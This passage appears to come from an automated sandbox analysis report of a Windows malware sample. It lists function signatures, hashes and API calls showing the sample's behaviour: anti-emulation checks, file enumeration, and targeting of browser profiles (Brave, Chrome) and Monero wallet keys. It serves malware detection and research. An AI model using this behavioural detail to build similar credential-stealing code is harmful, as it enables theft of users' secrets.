                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                              • Instruction ID: 5ca118c45b310877e2c0459afa5c05bb17a3a3ae7f73012344c495b8d407527b
                              • Opcode Fuzzy Hash: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                              • Instruction Fuzzy Hash: B711F830900009ABCB18FB61DE57FED7378AF50304F80415CA81A4A192EF38BB15EA92
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                              • ExitProcess.KERNEL32 ref: 00FB1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                              • Instruction ID: 75fcfaf015bf4fbe6b0a833dae08aef115dd6222ef7aaf758c1723f241da6c4d
                              • Opcode Fuzzy Hash: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                              • Instruction Fuzzy Hash: 16E08670945308FBE7246BA1EC1AB48767CAF04B02F500158F70D771C4C6F926419B98
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FB10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                              • Instruction ID: 29e7c0a3c31356872067b4a712dc2bd80a180e28e6d9c327df7fc4f59da43341
                              • Opcode Fuzzy Hash: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                              • Instruction Fuzzy Hash: C5F0E971641204BBE71496A4AC59FAAB7D8E705B55F300458F504E3280D5726E40DB50
                              APIs
                                • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                                • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                                • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                                • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                                • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                                • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                              • ExitProcess.KERNEL32 ref: 00FB11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                              • Instruction ID: fef84329eaefb41e387e83d8ea625990b8a309eb7f32de4e446d5221c0077e09
                              • Opcode Fuzzy Hash: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                              • Instruction Fuzzy Hash: 1AE0C2B5D0030223CA1433B6BD0BF2A328C6F40385F20043CFA09C3142FA2DF801AA64
                              APIs
                              • wsprintfA.USER32 ref: 00FC38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC38E3
                              • lstrcat.KERNEL32(?,?), ref: 00FC3935
                              • StrCmpCA.SHLWAPI(?,00FD0F70), ref: 00FC3947
                              • StrCmpCA.SHLWAPI(?,00FD0F74), ref: 00FC395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC3C67
                              • FindClose.KERNEL32(000000FF), ref: 00FC3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                              • Instruction ID: c62026397b93f8216f1dd746fd78770f126d087a5ce45314ee59ba41ac5db0c8
                              • Opcode Fuzzy Hash: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                              • Instruction Fuzzy Hash: 36A17FB29002099BCB34DB64DD85FEE7379BF88300F04859CA51E97145EB79AB84DF62
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00FD0B32,00FD0B2B,00000000,?,?,?,00FD13F4,00FD0B2A), ref: 00FBBEF5
                              • StrCmpCA.SHLWAPI(?,00FD13F8), ref: 00FBBF4D
                              • StrCmpCA.SHLWAPI(?,00FD13FC), ref: 00FBBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00FBC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                              • Instruction ID: 888022208d8e9f505e44632e9c1d8908fba4658c84a20a0da29e4efb9578a1cf
                              • Opcode Fuzzy Hash: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                              • Instruction Fuzzy Hash: 97423372910109ABCB14FB60DE57FEE7379AF84304F40456CB50A96181EF38AB49DBA2
                              APIs
                              • wsprintfA.USER32 ref: 00FC492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                              • StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                              • StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00FC4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                              • Instruction ID: b256ce09fea5d03e95b49bf998b88d215fea6dcdc373a78405179b4abdd88d4c
                              • Opcode Fuzzy Hash: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                              • Instruction Fuzzy Hash: EB6162B2900219ABCB34EBA0EC45FEA737CBF48701F04459CA51E92144EB75EB859FA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                              • wsprintfA.USER32 ref: 00FC45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                              • StrCmpCA.SHLWAPI(?,00FD0FC4), ref: 00FC45EB
                              • StrCmpCA.SHLWAPI(?,00FD0FC8), ref: 00FC4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC468B
                              • FindClose.KERNEL32(000000FF), ref: 00FC46A0
                              • lstrcat.KERNEL32(?,00DEE9F8), ref: 00FC46C5
                              • lstrcat.KERNEL32(?,00DECF10), ref: 00FC46D8
                              • lstrlen.KERNEL32(?), ref: 00FC46E5
                              • lstrlen.KERNEL32(?), ref: 00FC46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                              • Instruction ID: 4ec28969c1416ef91c83388230d4b44ef6f5b1d6dd14ae7b5fb5e35340e45804
                              • Opcode Fuzzy Hash: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                              • Instruction Fuzzy Hash: 675155719002189BC724EB70DD9AFE9737CAF58700F40459CB51E92144EB79AA859F91
                              APIs
                              • wsprintfA.USER32 ref: 00FC3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC3EDA
                              • StrCmpCA.SHLWAPI(?,00FD0FAC), ref: 00FC3F08
                              • StrCmpCA.SHLWAPI(?,00FD0FB0), ref: 00FC3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC406C
                              • FindClose.KERNEL32(000000FF), ref: 00FC4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                              • Instruction ID: e913659a028f83bc401e1e495bc58ed9fdb62bf2d618f445fbbb980fbc5c2686
                              • Opcode Fuzzy Hash: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                              • Instruction Fuzzy Hash: FB5165B2900219ABCB24EBB0DD46FEA737CBF48700F44459CB25D92044DB79AB859F61
                              APIs
                              • wsprintfA.USER32 ref: 00FBED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FBED55
                              • StrCmpCA.SHLWAPI(?,00FD1538), ref: 00FBEDAB
                              • StrCmpCA.SHLWAPI(?,00FD153C), ref: 00FBEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00FBF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                              • Instruction ID: cbf3a044b7df04cac8de88851e8214f8e582ec873fa55d7201688fc508f6f69c
                              • Opcode Fuzzy Hash: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                              • Instruction Fuzzy Hash: F5E1BD7191111D9AEB68EB60DD53FEE7338AF54304F4041ADB50A62092EE387F8AEF51
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD15B8,00FD0D96), ref: 00FBF71E
                              • StrCmpCA.SHLWAPI(?,00FD15BC), ref: 00FBF76F
                              • StrCmpCA.SHLWAPI(?,00FD15C0), ref: 00FBF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00FBFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
